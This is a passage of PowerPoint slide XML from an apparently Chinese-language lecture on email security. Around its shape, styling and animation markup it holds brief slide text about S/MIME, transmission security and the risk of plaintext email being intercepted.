              <a:gd name="T22" fmla="*/ 0 w 7776864"/>
              <a:gd name="T23" fmla="*/ 463540 h 550192"/>
              <a:gd name="T24" fmla="*/ 0 w 7776864"/>
              <a:gd name="T25" fmla="*/ 92711 h 550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6864"/>
              <a:gd name="T40" fmla="*/ 0 h 550192"/>
              <a:gd name="T41" fmla="*/ 7776864 w 7776864"/>
              <a:gd name="T42" fmla="*/ 550192 h 550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6864" h="550192">
                <a:moveTo>
                  <a:pt x="0" y="91701"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="67380"/>
                  <a:pt x="9661" y="44056"/>
                  <a:pt x="26859" y="26859"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44056" y="9662"/>
                  <a:pt x="67381" y="0"/>
                  <a:pt x="91701" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7685163" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7709484" y="0"/>
                  <a:pt x="7732808" y="9661"/>
                  <a:pt x="7750005" y="26859"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7767202" y="44056"/>
                  <a:pt x="7776864" y="67381"/>
                  <a:pt x="7776864" y="91701"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7776864" y="458491"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7776864" y="482812"/>
                  <a:pt x="7767203" y="506136"/>
                  <a:pt x="7750005" y="523333"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7732808" y="540530"/>
                  <a:pt x="7709483" y="550192"/>
                  <a:pt x="7685163" y="550192"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="91701" y="550192"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="67380" y="550192"/>
                  <a:pt x="44056" y="540531"/>
                  <a:pt x="26859" y="523333"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9662" y="506136"/>
                  <a:pt x="0" y="482811"/>
                  <a:pt x="0" y="458491"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="91701"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="2AA1BF"/>
          </a:solidFill>
          <a:ln w="55000" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="99248" tIns="99248" rIns="99248" bIns="99248"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en-US" altLang="zh-CN" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>S/MIME</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59404" name="Freeform 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="5435600"/>
            <a:ext cx="7777162" cy="323850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7776864"/>
              <a:gd name="T1" fmla="*/ 0 h 324472"/>
              <a:gd name="T2" fmla="*/ 7779532 w 7776864"/>
              <a:gd name="T3" fmla="*/ 0 h 324472"/>
              <a:gd name="T4" fmla="*/ 7779532 w 7776864"/>
              <a:gd name="T5" fmla="*/ 318916 h 324472"/>
              <a:gd name="T6" fmla="*/ 0 w 7776864"/>
              <a:gd name="T7" fmla="*/ 318916 h 324472"/>
              <a:gd name="T8" fmla="*/ 0 w 7776864"/>
              <a:gd name="T9" fmla="*/ 0 h 324472"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 7776864"/>
              <a:gd name="T16" fmla="*/ 0 h 324472"/>
              <a:gd name="T17" fmla="*/ 7776864 w 7776864"/>
              <a:gd name="T18" fmla="*/ 324472 h 324472"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="7776864" h="324472">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7776864" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7776864" y="324472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="324472"/>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6915" tIns="24130" rIns="135128" bIns="2413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14300" indent="-1143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500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>支持邮件加密的传输协议</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504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9403"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59403"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59403"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5940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9401"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59401"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59401"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5940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9399"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59399"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59399"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59399"/>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59397"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59397"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59397"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59397"/>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59395"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59395"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59395"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59395"/>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59396"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59396"/>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59398"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59398"/>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59400"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59400"/>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59402"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59402"/>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59404"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59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ldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="59396" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="59397" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="59398" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="59399" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="59400" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="59401" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="59402" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="59403" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="59404" grpId="0" bldLvl="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a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{92EC3EC7-85EA-4F1E-9175-40974D09DA8B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60418" name="Freeform 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="900113" y="1260475"/>
            <a:ext cx="7570787" cy="579438"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7571184"/>
              <a:gd name="T1" fmla="*/ 96959 h 579149"/>
              <a:gd name="T2" fmla="*/ 28263 w 7571184"/>
              <a:gd name="T3" fmla="*/ 28398 h 579149"/>
              <a:gd name="T4" fmla="*/ 96482 w 7571184"/>
              <a:gd name="T5" fmla="*/ 0 h 579149"/>
              <a:gd name="T6" fmla="*/ 7471128 w 7571184"/>
              <a:gd name="T7" fmla="*/ 0 h 579149"/>
              <a:gd name="T8" fmla="*/ 7539350 w 7571184"/>
              <a:gd name="T9" fmla="*/ 28398 h 579149"/>
              <a:gd name="T10" fmla="*/ 7567590 w 7571184"/>
              <a:gd name="T11" fmla="*/ 96959 h 579149"/>
              <a:gd name="T12" fmla="*/ 7567590 w 7571184"/>
              <a:gd name="T13" fmla="*/ 484793 h 579149"/>
              <a:gd name="T14" fmla="*/ 7539350 w 7571184"/>
              <a:gd name="T15" fmla="*/ 553356 h 579149"/>
              <a:gd name="T16" fmla="*/ 7471128 w 7571184"/>
              <a:gd name="T17" fmla="*/ 581755 h 579149"/>
              <a:gd name="T18" fmla="*/ 96482 w 7571184"/>
              <a:gd name="T19" fmla="*/ 581755 h 579149"/>
              <a:gd name="T20" fmla="*/ 28263 w 7571184"/>
              <a:gd name="T21" fmla="*/ 553356 h 579149"/>
              <a:gd name="T22" fmla="*/ 0 w 7571184"/>
              <a:gd name="T23" fmla="*/ 484793 h 579149"/>
              <a:gd name="T24" fmla="*/ 0 w 7571184"/>
              <a:gd name="T25" fmla="*/ 96959 h 579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71184"/>
              <a:gd name="T40" fmla="*/ 0 h 579149"/>
              <a:gd name="T41" fmla="*/ 7571184 w 7571184"/>
              <a:gd name="T42" fmla="*/ 579149 h 579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71184" h="579149">
                <a:moveTo>
                  <a:pt x="0" y="96527"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="70926"/>
                  <a:pt x="10170" y="46374"/>
                  <a:pt x="28272" y="28272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46374" y="10170"/>
                  <a:pt x="70926" y="0"/>
                  <a:pt x="96527" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7474657" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7500258" y="0"/>
                  <a:pt x="7524810" y="10170"/>
                  <a:pt x="7542912" y="28272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7561014" y="46374"/>
                  <a:pt x="7571184" y="70926"/>
                  <a:pt x="7571184" y="96527"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7571184" y="482622"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7571184" y="508223"/>
                  <a:pt x="7561014" y="532775"/>
                  <a:pt x="7542912" y="550877"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7524810" y="568979"/>
                  <a:pt x="7500258" y="579149"/>
                  <a:pt x="7474657" y="579149"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="96527" y="579149"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="70926" y="579149"/>
                  <a:pt x="46374" y="568979"/>
                  <a:pt x="28272" y="550877"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10170" y="532775"/>
                  <a:pt x="0" y="508223"/>
                  <a:pt x="0" y="482622"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="96527"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="2AA1BF"/>
          </a:solidFill>
          <a:ln w="55000" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="104472" tIns="104472" rIns="104472" bIns="104472"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传输安全</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60419" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="900113" y="1839913"/>
            <a:ext cx="7570787" cy="341312"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7571184"/>
              <a:gd name="T1" fmla="*/ 0 h 341550"/>
              <a:gd name="T2" fmla="*/ 7567590 w 7571184"/>
              <a:gd name="T3" fmla="*/ 0 h 341550"/>
              <a:gd name="T4" fmla="*/ 7567590 w 7571184"/>
              <a:gd name="T5" fmla="*/ 339413 h 341550"/>
              <a:gd name="T6" fmla="*/ 0 w 7571184"/>
              <a:gd name="T7" fmla="*/ 339413 h 341550"/>
              <a:gd name="T8" fmla="*/ 0 w 7571184"/>
              <a:gd name="T9" fmla="*/ 0 h 341550"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 7571184"/>
              <a:gd name="T16" fmla="*/ 0 h 341550"/>
              <a:gd name="T17" fmla="*/ 7571184 w 7571184"/>
              <a:gd name="T18" fmla="*/ 341550 h 341550"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="7571184" h="341550">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7571184" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7571184" y="341550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3415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385" tIns="25400" rIns="142240" bIns="254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电子邮件的内容大多是明文在网上传输，传输过程可能被窃听</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60420" name="Freeform 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="900113" y="2181225"/>
            <a:ext cx="7570787" cy="579438"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 7571184"/>
              <a:gd name="T1" fmla="*/ 96959 h 579149"/>
              <a:gd name="T2" fmla="*/ 28263 w 7571184"/>
              <a:gd name="T3" fmla="*/ 28398 h 579149"/>
              <a:gd name="T4" fmla="*/ 96482 w 7571184"/>
              <a:gd name="T5" fmla="*/ 0 h 579149"/>
              <a:gd name="T6" fmla="*/ 7471128 w 7571184"/>
              <a:gd name="T7" fmla="*/ 0 h 579149"/>
              <a:gd name="T8" fmla="*/ 7539350 w 7571184"/>
              <a:gd name="T9" fmla="*/ 28398 h 579149"/>
              <a:gd name="T10" fmla="*/ 7567590 w 7571184"/>
              <a:gd name="T11" fmla="*/ 96959 h 579149"/>
              <a:gd name="T12" fmla="*/ 7567590 w 7571184"/>
              <a:gd name="T13" fmla="*/ 484793 h 579149"/>
              <a:gd name="T14" fmla="*/ 7539350 w 7571184"/>
              <a:gd name="T15" fmla="*/ 553356 h 579149"/>
              <a:gd name="T16" fmla="*/ 7471128 w 7571184"/>
              <a:gd name="T17" fmla="*/ 581755 h 579149"/>
              <a:gd name="T18" fmla="*/ 96482 w 7571184"/>
              <a:gd name="T19" fmla="*/ 581755 h 579149"/>
              <a:gd name="T20" fmla="*/ 28263 w 7571184"/>
              <a:gd name="T21" fmla="*/ 553356 h 579149"/>
              <a:gd name="T22" fmla="*/ 0 w 7571184"/>
              <a:gd name="T23" fmla="*/ 484793 h 579149"/>
              <a:gd name="T24" fmla="*/ 0 w 7571184"/>
              <a:gd name="T25" fmla="*/ 96959 h 579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71184"/>
              <a:gd name="T40" fmla="*/ 0 h 579149"/>
              <a:gd name="T41" fmla="*/ 7571184 w 7571184"/>
              <a:gd name="T42" fmla="*/ 579149 h 579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71184" h="579149">
                <a:moveTo>
                  <a:pt x="0" y="96527"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="70926"/>
                  <a:pt x="10170" y="46374"/>
                  <a:pt x="28272" y="28272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46374" y="10170"/>
                  <a:pt x="70926" y="0"/>
                  <a:pt x="96527" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7474657" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7500258" y="0"/>
                  <a:pt x="7524810" y="10170"/>
                  <a:pt x="7542912" y="28272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7561014" y="46374"/>
                  <a:pt x="7571184" y="70926"/>
                  <a:pt x="7571184" y="96527"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7571184" y="482622"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7571184" y="508223"/>
                  <a:pt x="7561014" y="532775"/>
                  <a:pt x="7542912" y="550877"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7524810" y="568979"/>
                  <a:pt x="7500258" y="579149"/>
                  <a:pt x="7474657" y="579149"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="96527" y="579149"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="70926" y="579149"/>
                  <a:pt x="46374" y="568979"/>
                  <a:pt x="28272" y="550877"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10170" y="532775"/>
                  <a:pt x="0" y="508223"/>
                  <a:pt x="0" y="482622"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="96527"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
